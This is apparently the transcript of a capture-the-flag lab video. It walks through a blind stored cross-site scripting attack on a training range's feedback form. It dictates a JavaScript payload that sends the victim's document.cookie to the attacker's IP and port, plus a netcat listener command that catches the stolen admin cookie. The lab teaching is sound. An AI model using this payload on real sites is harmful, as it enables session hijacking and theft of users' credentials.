Hey, what's up? It's Jerry. This is the blindfolded range. Goal 2, which is essentially getting a flag from the cookies of a victim using a cross-site scripting attack, specifically a blind cross-site scripting attack. So what I'm going to show you in this video over the next couple minutes is explain to you a little bit about what cross-site scripting is, show you how it works in the context of the blindfolded range, and then actually demonstrate it so you can appreciate what's going on. Plus, I'm going to go a little bit deeper and show you kind of the network traffic and hopefully have it connect for you as far as what is going on here. So on the blindfolded range, you can see we have found already a web browser browsing on or serving on port 9590, which was the first goal. Now, I just want to note your target IP, this IP address here, will be different for you than what you see in this because every single time you spin up the blindfolded range, this IP address changes. We've also found out using ifconfig in a root shell, and then I just did grep inet to make it easier to read. We have figured out what the IP address is of our own Kali instance. So this is the IP address of the machine that we are operating from. So there's two systems in this range. There's our Kali instance, which this is the IP address of, and then there is the web server hosting the Blindfold Emporium that is at this IP address. Okay, it's important to know we'll need our Kali IP address momentarily. Now, really quickly, if you want to learn a little bit about cross-site scripting, I recommend you go to OWASP.org. That's where you'll learn about all sorts of web application vulnerabilities. But essentially, a cross-site scripting vulnerability allows an attacker to put code or malicious code into a web application and have it execute later maliciously. Now, what does that mean? Well, remember, we use the internet all the time. We type in 140 characters into Twitter and type enter. We type social media posts into Facebook and LinkedIn. And when we hit enter and it posts to the service, then our friends and family and loved ones, they come onto the social media platform and they see in your feed what you posted, right? Nothing malicious there. Well, if you use JavaScript, a programming language, to put code into these form fields, so instead of saying, I ate biscuits and gravy for breakfast today, and add a picture, I say, I ate, and then caret script, caret alert dot box, like start adding specific JavaScript code, and then hit enter. If the web app is vulnerable to cross-site scripting, its potential, anyone looking at your feed actually gets the pop-up. And there's a really, really famous case, if you want to go a little bit deeper into a classic cross-site scripting vulnerability being exploited. I recommend you Google or search for Sammy Camcar MySpace cross-site scripting, or XSS, which is the shorthand acronym for cross-site scripting. Fascinating case study for cross-site scripting. So in the context of this, we are going to be exploring this web app right here to understand if it's vulnerable to cross-site scripting. And there's a feedback form right here, which is a big text area that's classic opportunity for cross-site scripting. Now, I want to let you know that I have activated a tool called Burp Suite that will intercept network traffic between me on the Kali box using the web browser and the web server hosting this. So I have to take an extra step, but it'll all make sense in a second. So you see, I have to take this extra step, no big deal. And here is the submission form. So we can say, hello, right? No big deal, hello. And we could submit it and it would be fine. And when we do submit it, I just want to point out, you can see here that the request comes in and you can see this right here is the network packet traffic being sent to the web server. And you can see right there that feedback field has the text hello because that's what I typed into it. Okay, now let's do some more interesting stuff. We can go ahead and forward that on, and it says thanks for the feedback, and admin will review shortly. So let's get that feedback box up again. Now let's put something a little bit more interesting in, right? So you can see here I've put in some JavaScript. Now, what are we actually looking at here? Okay. First of all, you can Google cross-site scripting to get some of this context, and also blind cross-site scripting, which this is specifically, and I'll explain that in a second. But you'll see here that there is the quote and then the end bracket. This is basically JavaScript and kind of HTML formatting to say that you're closing off some field to start a new field. It's a clean way, so then we can start using this classic JavaScript type code. And you can see JavaScript starts with an open greater than script and then closed greater than. This right here is how you begin JavaScript and how you end JavaScript. And JavaScript will run in the browser of the user. So websites that are really interesting, really interactive and stuff, they typically have JavaScript running on them. And when you visit the website and things pop up or things blink or whatever, is a possibility that the developers of the website are using JavaScript for that interactivity inside of your web browser. So what we're going to do is abuse that through a cross-site scripting vulnerability the same way. Now, what have we done here? We have put document.location equals HTTP 10.161.44.5.9001. Cookie equals something plus document cookie, okay? Plus document cookie. So let me break down what's going on here. First of all, this IP address right here is this IP address. It's the IP address of my Kali box. Remember, I told you that before. It's the Kali instance. Now, we're going to have to start a netcat listener, and we'll start it on 9001. This is nc-nlvp netcat, and then the argument's nlvp 9001. Because what we want to do is we want our Kali box waiting like a catcher with a catcher's mitt, waiting for that pitch to come in. We're going to throw the pitch through the form field. We're going to catch it on our Kali box, okay? So that's what this is saying. It's saying whenever someone reads this in their browser or renders this text, we want the browser of the victim to go pull this resource from this location, which would be our box with this listening port. So we're going to be ready for it. And then actually add in a cookie field, document.cookie, right? And we could call this field anything we want. Here, let's call it Haiku, right? We could call it anything we want. It doesn't have to be cookie. What's important is this right here, document.cookie. This is a specific keyword, and what it's going to do is it's going to grab the cookie of the victim and deliver it to us on our receiving end. And I'll show you that in a second. Now, why would we want this? Well, a lot of times, web applications use cookies to maintain sessions and sometimes for authentication and stuff like that. So like when you're moving around a website, you don't have to log in repeatedly. Those cookies sometimes do that. If you add something to your shopping cart and you're moving around the shop and you don't have to keep adding it to your shopping cart, it's because the cookie's holding it, right? Well, that's what we want. We want that. Now, what I want you to point out is the final piece of this. This is called a blind cross-site scripting because we're going to submit it, and this is going to be stored in some type of database, right? And as it said, please submit feedback below. Well, who's going to look at the feedback? Probably an administrator of the website or some type of developer of the website. And they aren't going to be going through the front end. They're typically looking through a back end system of like, oh, here's the, here are all the feedback requests that came in or feedback formats that came in. And they may not be doing input validation. So we'll send this, but we don't know when the victim's going to check the feedback, and we don't know if the back end is even vulnerable to cross-site scripting. But believe me, this one is. So we're going to go ahead and enjoy that. So let's go ahead and hit submit, and you could see our Burp Suite caught it again before we sent it. And I just want to point out, remember it said hello before? Well, now the feedback reads all of this good stuff. And this is essentially our JavaScript, except it's been encoded, or basically the special characters like the equal sign, the quote, the plus symbol and stuff have been converted to hex essentially. So the browser and the engine and everything can interpret it. But that's fine. Just know that that's what it looks like. We're posting that to the web server, okay? So let's check out what happens. I'm going to have to forward this, but before I do that, I need to set up my listener. All right, we are listening. Let's see if we hear anything. We're going to go ahead and hit forward. You can see the website stored it, and maybe the admin's going to check. Maybe the admin's going to check. And it looks like the admin did check. There it is. And you can see here, there it is. Our flag, we called it Haiku. We could have called it anything. Grabbed the cookie of the victim and sent it right over to us. This right here was a successful cross-site scripting attack. And you can do it too. Again, you don't have to use the burp suite. I just did that to highlight and show you how the traffic was flowing through. But this is it. And just to close out the range, by copying this particular flag, we can use Control-Shift to get the guacamole thing, right? Then click and save, copy it, go up here and let's drop it in and see what happens. And there you go, just like that. You've done cross-site scripting. Hope you enjoyed it. Hope you learned something. We'll see you in the next one.